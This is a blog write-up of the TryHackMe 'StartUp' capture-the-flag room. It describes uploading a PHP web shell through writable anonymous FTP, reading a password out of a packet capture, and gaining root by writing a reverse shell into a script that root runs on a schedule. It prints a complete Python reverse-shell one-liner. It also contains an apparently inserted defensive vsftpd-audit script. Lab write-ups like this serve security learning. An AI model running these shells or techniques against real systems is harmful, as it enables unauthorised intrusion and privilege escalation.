HackAndStuff

Tryhackme - StartUp Room WriteUp

Tryhackme | 3 min read

Startup

StartUp is an easy-difficulty room developed by r1gormort1s. You can check out the room here.

As always, let's start with nmap.

nmap -sC -sV -v -oA nmap/initial IP

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx 2 65534 65534 4096 Nov 12 04:53 ftp [NSE: writeable]
| -rw-r--r-- 1 0 0 251631 Nov 12 04:02 important.jpg
|_-rw-r--r-- 1 0 0 208 Nov 12 04:53 notice.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.9.51.118
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
| 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
|_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Maintenance
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

We have anonymous FTP login, so let's jump in and see what's in the ftp directory.

[Image: ftp]

The notice.txt file says:

Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.

Nothing interesting; we just have a name, Maya, for now. We also have an image, important.jpg. I ran strings and exiftool and tried some stego on it, but in the end it's just a rabbit hole. What I forgot is that, as the nmap scan showed, we have write permissions in the ftp directory. And if you have that, you shouldn't even bother trying lame stego stuff!

I got a simple PHP web shell from here and uploaded it to the ftp directory. But we don't know yet where on the server it got uploaded. So I ran gobuster for some recon, and we have a /files directory. So the ftp content is present on the server in the /files/ftp directory. Accessing our web shell in the browser, we have code execution.

[Image: webshell]
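The defender's view of this foothold, as an added example (not the room's configuration): a small audit that parses a vsftpd config and flags the two conditions that made the upload possible, anonymous write access and an anonymous root that the web server also serves. Both configs below are constructed, the /var/www prefix is an assumption about where Apache serves from, and the directive names and defaults are vsftpd's own.

```python
# Constructed config reproducing the exposure in the scan above (not the room's real one).
WEAK_CONF = """\
anonymous_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
anon_root=/var/www/html/files/ftp
"""
# Hardened counterpart: anonymous access stays, but read-only and outside the web root.
HARDENED_CONF = """\
anonymous_enable=YES
write_enable=NO
anon_upload_enable=NO
anon_mkdir_write_enable=NO
anon_other_write_enable=NO
anon_root=/srv/ftp
"""
# Defaults from vsftpd.conf(5), applied when the file does not set a key.
DEFAULTS = {"anonymous_enable": "YES", "write_enable": "NO", "anon_upload_enable": "NO",
            "anon_mkdir_write_enable": "NO", "anon_other_write_enable": "NO"}
ANON_WRITE_KEYS = ("anon_upload_enable", "anon_mkdir_write_enable", "anon_other_write_enable")
WEB_ROOTS = ("/var/www/",)  # assumption: document roots the web server serves from

def parse_vsftpd(text):
    """Return {key: value} from key=value lines, skipping blanks and comments."""
    conf = dict(DEFAULTS)
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, _, value = line.partition("=")
            conf[key.strip().lower()] = value.strip()
    return conf

def audit_vsftpd(text):
    """Return findings for the anonymous share; empty means read-only and not web-served."""
    conf = parse_vsftpd(text)
    yes = lambda key: conf[key].upper() == "YES"
    if not yes("anonymous_enable"):
        return []  # nothing below matters without anonymous login
    findings = []
    # vsftpd only honours the anon_* write switches when write_enable is on as well.
    if yes("write_enable") and any(yes(k) for k in ANON_WRITE_KEYS):
        findings.append("anonymous users can create or modify files in the share")
    root = conf.get("anon_root", "")
    if root.startswith(WEB_ROOTS):
        findings.append("anonymous share %s is inside the web document root" % root)
    return findings
```

Running audit_vsftpd over WEAK_CONF yields both findings; over HARDENED_CONF it yields none, because write_enable=NO disables every anon_* write switch and the share no longer sits under the web root.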

Now, the first thing you do when you get code execution is, yup, get a reverse shell! So I ran a simple Python one-liner reverse shell, and we have a SHELL!

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<IP>,<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

To make it stable and a full TTY, the usual stuff:

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL-Z to background it.
stty raw -echo
fg
reset

And now we have a PROPER SHELL! To confirm that, we run id, and indeed we are in as www-data.

[Image: shell]

Time for some recon. I manually looked for interesting stuff on the system, and in the root directory I found something interesting.

[Image: recipe]

We now have the secret recipe. If we look closely, there is one more directory that is not usual: incidents. It contains a file that is outright suspicious, as it is named suspicious.pcapng. This is a network capture file and, as the directory name suggests, maybe it is an incident log. Opening it up with Wireshark, we see a lot of HTTP and TCP traffic. Initially I looked at the exported HTTP objects, but there was nothing interesting there. On following a TCP stream, I saw an interesting conversation.

[Image: wireshark]

We have a password being used by some attacker in his attack. There is just one user on the system, lennie; trying this password with lennie, we get a match. Now we are lennie. Looking in lennie's home directory, we have our user flag.

[Image: lennie]

Time to be ROOT !

Okay, so if we look at the contents of lennie's home directory, we see a scripts directory owned by root, which is interesting.

[Image: scripts]

But weirdly, there is no SUID bit set, and we also don't have write permissions for planner.sh, so let's leave it for now. Next I used linpeas for enumeration, but it didn't find anything juicy. I was stuck at this point. The only thing we have is a root-owned script, so let's focus on that. planner.sh is root owned, and it simply does two things.

  1. Puts the content of the env variable LIST in the startup_list.txt file. We can't do anything bad with it.
  2. Runs /etc/print.sh.

Let's look at the permissions of print.sh. Dude, we have write permissions. But even if we do some stuff with this, we don't have SUID, so we can't be root. OR CAN WE? I decided to use pspy64, which is basically a process snooper that shows the processes running on the system (NO, it's not the same as running ps aux, man, it even shows you privileged processes; try it, it's COOL!).

[Image: pspy]

And as I suspected, root is running this script. So, the classic bad stuff: we have write permissions for print.sh, put a dumb bash one-liner reverse shell in it, andddd listen on your dumb netcat. After a minute, we have our root shell and our ROOT flag.

[Image: root]

So this was overall a relatively easy TryHackMe room with misconfigured FTP, insecurely placed incident logs and bad file permissions.

[Image: hacked]

Hope you learned something new. Thanks for reading and, as always,

See ya later!

© 2021 by Jatin Malik. All rights reserved.